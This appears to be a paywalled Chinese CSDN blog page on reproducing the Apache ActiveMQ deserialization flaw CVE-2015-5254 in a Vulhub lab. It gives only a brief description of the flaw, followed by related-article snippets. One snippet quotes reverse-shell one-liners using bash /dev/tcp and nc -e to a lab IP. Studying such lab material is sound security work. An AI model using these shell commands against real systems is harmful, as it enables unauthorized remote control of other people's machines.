[ vulhub漏洞复现篇 ] ActiveMQ反序列化漏洞复现(CVE-2015-5254)

最新推荐文章于 2024-04-26 09:25:31 发布
最新推荐文章于 2024-04-26 09:25:31 发布
阅读量2.8k 收藏 61
点赞数 54
分类专栏: vulhub 文章标签: java-activemq activemq java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/126332307
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞编号

CVE-2015-5254

二、漏洞简介

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

三、受影响版本


                

                
                
        

        

        

    




        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
                
                    
                    超级会员免费看
                
            

            
            
            
        

    

      

        

            

              
                
                  _PowerShell
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    54
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    61
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  38
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          

                

                        订阅专栏
                










                



	

		

			

				
					
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具

				
			

			

				

					08-15
				

			

		

		

			
				
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。  反序列化漏洞通常发生在对象从...

			
		

	



                

              
                



	

		

			

				
					
ActiveMQ 反序列化漏洞CVE-2015-5254复现

				
			

			

				

					糖小喵
				

				

					04-12
					
					323
					
				

			

		

		

			
				
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...

			
		

	



                


  
              

                


	

		

			

				
					
[ vulhub漏洞复现 ] vulhub 漏洞集合(含漏洞复现文章连接)

				
			

			

				

					qq_51577576的博客
				

				

					09-21
					
					1万+
					
				

			

		

		

			
				
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。
计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅
我也会不定期再中间更新复现文章链接
目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者

			
		

	





	

		

			

				
					
Kali 搭建Vulhub靶场 (详细)

				
			

			

				

					qq_43508668的博客
				

				

					04-21
					
					1490
					
				

			

		

		

			
				
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub
安装Docker
检查软件更新
apt-get update

安装https协议、CA证书
apt-get install -y apt-transport-https ca-certificates

安装docker
apt install docker.io


docker -v

查看是否安装成功
启动docker
systemctl start docker

显示docker信息
docker ps -

			
		

	



		

			
		



	

		

			

				
					
vulhub靶场搭建及漏洞复现教程

					
热门推荐

				
			

			

				

					Cwillchris的博客
				

				

					03-25
					
					2万+
					
				

			

		

		

			
				
准备一个纯净的ubantu系统



1、先更新一下安装列表

sudo apt-get update



2、安装docker.io

sudo apt install docker.io



查看是否安装成功

docker -v





3、查看是否安装pip

pip -V

检测到未安装,提示是否安装,按y下载



再次输入pip -V查看是否安装成功



4、安装docker-compose

pip install docker-compose



查看是否安装成功

docker

			
		

	





	

		

			

				
					
vulhub漏洞复现1

				
			

			

				

					xhscxj的博客
				

				

					05-23
					
					1926
					
				

			

		

		

			
				
CVE-2018-18778
CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞
Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。
影响版本:ACME mini_httpd before 1.30 
分析
当mini_httpd开启虚拟主机时,此

			
		

	





	

		

			

				
					
漏洞复现vulhub 中间件漏洞

				
			

			

				

					qq_46421742的博客
				

				

					08-09
					
					393
					
				

			

		

		

			
				
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。

			
		

	





	

		

			

				
					
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具

				
			

			

				

					11-25
				

			

		

		

			
				
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看

			
		

	





	

		

			

				
					
boot-example-activemq-topic-2.0.5

				
			

			

				

					01-27
				

			

		

		

			
				
SpringBoot+ActiveMQ-发布订阅  Topic 主题  * 消息消费者(订阅方式)消费该消息  * 消费生产者将发布到topic中,同时有多个消息消费者(订阅)消费该消息  * 这种方式和点对点方式不同,发布到topic的消息会被所有...

			
		

	





	

		

			

				
					
apache-activemq-5.16.5

				
			

			

				

					12-27
				

			

		

		

			
				
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。  描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...

			
		

	





	

		

			

				
					
VS2015 activeMq-cpp3.9.5 Win32版本 DLL方式运行。

				
			

			

				

					04-13
				

			

		

		

			
				
ActiveMQ-CPP 3.9.5 VS2015环境下编译好的lib库,Win32版本,x64版本由于项目不使用,所以没编译。上次文档中包含了所需的头文件和lib库。 底层库版本:expat-2.2.5,apr-util-1.6.1-win32,apr-iconv-1.2.2-win32...

			
		

	





	

		

			

				
					
命令执行漏洞【2】vulhub远程命令执行漏洞复现

					
最新发布

				
			

			

				

					LfanBQX的博客
				

				

					04-26
					
					357
					
				

			

		

		

			
				
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1           (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端   nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现

			
		

	





	

		

			

				
					
vulhub-spring漏洞复现

				
			

			

				

					qq_51922767的博客
				

				

					09-14
					
					2573
					
				

			

		

		

			
				
vulhub-spring漏洞复现

			
		

	





	

		

			

				
					
vulhub漏洞复现78_Weblogic

				
			

			

				

					weixin_44193247的博客
				

				

					02-15
					
					1909
					
				

			

		

		

			
				
vulhub漏洞复现练习

			
		

	





	

		

			

				
					
Vulhub靶场之Tomcat漏洞复现

				
			

			

				

					weixin_66717977的博客
				

				

					06-30
					
					433
					
				

			

		

		

			
				
tomcat漏洞复现

			
		

	





	

		

			

				
					
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)复现

				
			

			

				

					qq_45300786的博客
				

				

					04-16
					
					379
					
				

			

		

		

			
				
https://blog.csdn.net/weixin_43071873/article/details/110233234
https://www.cnblogs.com/tr1ple/p/11203366.html



			
		

	





	

		

			

				
					
Weblogic系列漏洞复现——vulhub

				
			

			

				

					qq_45612828的博客
				

				

					08-08
					
					1970
					
				

			

		

		

			
				
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) 
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
Weblogic 任意文件上传漏洞CVE-2018-2894)
Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883)
Weblogic ssrf(CVE-2014-4210)......

			
		

	





	

		

			

				
					
(四)vulhub专栏:Struct2漏洞复现汇总(持续更新中...)

				
			

			

				

					云舒的博客
				

				

					07-12
					
					2072
					
				

			

		

		

			
				
Struct2漏洞复现汇总

			
		

	





	

		

			

				
					
ActiveMQ 反序列化漏洞

				
			

			

				

					08-19
				

			

		

		

			
				
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化机制造成的。

攻击者可以构造恶意序列化对象,然后将其发送给 ActiveMQ 服务器。当服务器接收到恶意序列化对象并进行反序列化时,恶意代码就会被执行,从而导致系统受到攻击。

为了防止 ActiveMQ 反序列化漏洞的利用,可以采取以下措施:

1. 更新和升级:及时更新 ActiveMQ 版本,以获取最新的安全修复和漏洞修复。

2. 配置安全策略:通过配置 ActiveMQ 的安全策略来限制用户对序列化和反序列化的访问权限,只允许信任的类进行反序列化操作。

3. 输入验证和过滤:在接收到消息之前,对用户提交的数据进行严格的输入验证和过滤,确保只接受合法和可信的数据。

4. 序列化过滤:实施白名单机制,只允许特定的类进行反序列化操作,阻止未知类的反序列化。

5. 安全意识培训:加强对开发人员和系统管理员的安全意识培训,提高他们对反序列化漏洞的认识,以及如何正确地使用 ActiveMQ。

请注意,这些建议只是一些通用的防御措施,具体的安全配置和防护措施需要根据实际情况进行调整和实施。建议在使用 ActiveMQ 或其他中间件时,密切关注厂商的安全公告和最佳实践。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 38

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
_PowerShell

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值